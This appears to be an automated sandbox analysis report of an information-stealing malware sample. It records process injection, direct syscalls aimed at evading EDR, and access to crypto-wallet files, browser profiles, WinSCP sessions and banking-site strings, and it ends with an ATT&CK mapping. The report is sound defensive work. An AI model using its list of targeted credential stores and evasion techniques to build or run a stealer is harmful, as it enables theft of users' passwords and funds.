Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 9mauyKC3JW.exe, 00000000.00000002.1503032928.0000000000700000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\AppData\Local\Temp\hv.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\hv.exe

Code function: 2_2_6CD4A7D6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_6CD4A7D6

Source: C:\Users\user\Desktop\9mauyKC3JW.exe

Code function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,

0_2_00406D5D

Source: C:\Users\user\AppData\Local\Temp\hv.exe	Code function: 2_2_6CAF7104 mov eax, dword ptr fs:[00000030h]	2_2_6CAF7104
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 3_2_6C2D7104 mov eax, dword ptr fs:[00000030h]	3_2_6C2D7104
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 9_2_6C377104 mov eax, dword ptr fs:[00000030h]	9_2_6C377104
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BD97104 mov eax, dword ptr fs:[00000030h]	15_2_6BD97104

Source: C:\Users\user\AppData\Local\Temp\hv.exe

Code function: 2_2_6CD4A7D6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_6CD4A7D6

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtCreateFile: Direct from: 0x7FF6AC4707F6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC23C4E3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtProtectVirtualMemory: Direct from: 0x7FF6AC2EECD2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtCreateFile: Direct from: 0x7FF6AC46D36C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQueryValueKey: Direct from: 0x14011D93E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQuerySystemInformation: Direct from: 0x7FF6AC40E70A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC305E2F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC246878	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtRequestWaitReplyPort: Direct from: 0x7FF6AC37B423	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	NtQuerySystemInformation: Direct from: 0xE550CA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtClose: Indirect: 0x14012000F
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtReadFile: Direct from: 0x7FF6AC2EAB61	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC341E98	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtProtectVirtualMemory: Direct from: 0x7FF6AC47DCC0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtCreateFile: Direct from: 0x7FF6AC2E269C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC471AF8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtProtectVirtualMemory: Direct from: 0x7FF6AC47FB2E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtOpenFile: Direct from: 0x7FF7AB3B2A93	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtOpenFile: Direct from: 0x7FFBCB7626A1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC2F104A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC30415A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQueryInformationToken: Direct from: 0x7FF6AC30C074	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x14011D808	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC39F97E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQueryInformationProcess: Direct from: 0x7FF6AC2F06C0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC34BA08	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtEnumerateValueKey: Direct from: 0x7FF6AC2DA43C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtSetInformationProcess: Direct from: 0x7FF6AC2F1C9A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC348AFC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtOpenFile: Direct from: 0x7FF7AB5516CA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC373A63	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQuerySystemInformation: Direct from: 0x7FF6AC2E7907	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQuerySystemInformation: Direct from: 0x7FF6AC478555	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC240984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtClose: Direct from: 0x7FF6AC472D4B
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtOpenFile: Direct from: 0x7FF7AB3BD9BB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtCreateThreadEx: Direct from: 0x7FF6AC234A16	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtCreateFile: Direct from: 0x7FF7AB3EC074	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQuerySystemInformation: Direct from: 0x7FF6AC2E4D6A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC240CDF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC31049B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQueryValueKey: Direct from: 0x7FF6AC30F960	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	NtSetInformationThread: Direct from: 0x6C37ADFC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQueryInformationToken: Direct from: 0x7FF6AC37E6D7	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtProtectVirtualMemory: Direct from: 0x7FF6AC2DA568	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtProtectVirtualMemory: Direct from: 0x7FF6AC2DDDC9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQuerySystemInformation: Direct from: 0x7FF6AC347139	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtDeviceIoControlFile: Direct from: 0x7FF6AC2EA103	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtClose: Direct from: 0x7FF6AC472D5F
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtReadVirtualMemory: Direct from: 0x7FF6AC46D04B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC23F124	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC303711	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtClose: Direct from: 0x14011D864
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtProtectVirtualMemory: Direct from: 0x7FF6AC47FC06	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	NtSetInformationThread: Direct from: 0x6C2DADFC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQueryValueKey: Direct from: 0x7FF6AC310402	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtProtectVirtualMemory: Direct from: 0x7FF6AC2384B4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC248E7D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FFBCB784B5E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtCreateThreadEx: Direct from: 0x7FF6AC2347BE	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	NtQuerySystemInformation: Direct from: 0x1D50CA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQuerySystemInformation: Direct from: 0x7FF6AC2DD9BB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQuerySystemInformation: Direct from: 0x7FF6AC37568C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQueryValueKey: Direct from: 0x7FF6AC30FED9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtClose: Direct from: 0x7FF6AC472D6D
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC2E4C2D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQuerySystemInformation: Direct from: 0x7FF6AC412F5D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC2F6D15	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtCreateFile: Direct from: 0x7FF7AB54D36C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtCreateFile: Direct from: 0x7FF7AB5507F6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtProtectVirtualMemory: Direct from: 0x7FF6AC2D2A93	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQueryInformationToken: Direct from: 0x7FF6AC3432A0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC2EC47D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtClose: Direct from: 0x7FF6AC470823
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC2938A9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtProtectVirtualMemory: Direct from: 0x7FF6AC37B22B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC40F8CE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtProtectVirtualMemory: Direct from: 0x7FF6AC4716CA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQueryValueKey: Direct from: 0x7FF6AC310516	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC2559C6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtSetInformationProcess: Direct from: 0x7FF6AC2F05E6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	NtProtectVirtualMemory: Direct from: 0x77457B2E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	NtSetInformationThread: Direct from: 0x6BD9ADFC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtOpenKeyEx: Direct from: 0x7FF6AC30F4B2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtCreateFile: Direct from: 0x7FF7AB3C269C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtQueryInformationProcess: Direct from: 0x7FF6AC2E2B3B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtReadFile: Direct from: 0x14011D832	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC2EAB04	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC4176C9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC23CFC7	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtCreateFile: Direct from: 0x14011D7A4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtCreateFile: Direct from: 0x7FF7AB427139	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC246EB0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC2344D2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtClose: Direct from: 0x7FF6AC34742F
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtProtectVirtualMemory: Direct from: 0x7FF6AC34B948	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtProtectVirtualMemory: Direct from: 0x7FF6AC381678	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtCreateFile: Direct from: 0x7FF7AB4232A0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC2405E0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x140120A3C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6AC345AC1	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe protection: read write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe base: 14011BC08	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe base: 2FB010	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe base: 14011BC08	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe base: 2B5010	Jump to behavior

Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Process created: C:\Users\user\AppData\Local\Temp\hv.exe "C:\Users\user\AppData\Local\Temp\hv.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Jump to behavior

Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd

Source: C:\Users\user\Desktop\9mauyKC3JW.exe

Code function: 0_2_0040D72E cpuid

0_2_0040D72E

Source: C:\Users\user\Desktop\9mauyKC3JW.exe

Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,

0_2_00401F9D

Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\9mauyKC3JW.exe

Code function: 0_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_00401626

Source: C:\Users\user\Desktop\9mauyKC3JW.exe

Code function: 0_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,

0_2_00404FAA

Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: Localdockerv3.exe, 00000008.00000003.1997630296.0000000000A9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: Localdockerv3.exe, 00000008.00000002.2160661904.0000000000A93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: wallets\Exodus\exodus.wallet
Source: Localdockerv3.exe, 00000008.00000003.1957732743.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: Exodus\exodus.wallet
Source: Localdockerv3.exe, 00000008.00000003.1938789281.0000000000AF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: t\??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\24a4ohrz.default-release	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\kz8kl7vh.default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Directory queried: C:\Users\user\Documents			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Directory queried: C:\Users\user\Documents			Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	11 DLL Side-Loading	212 Process Injection	11 Masquerading	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Virtualization/Sandbox Evasion	1 Credentials in Registry	211 Security Software Discovery	Remote Desktop Protocol	21 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 DLL Side-Loading	212 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Abuse Elevation Control Mechanism	LSA Secrets	13 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	146 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
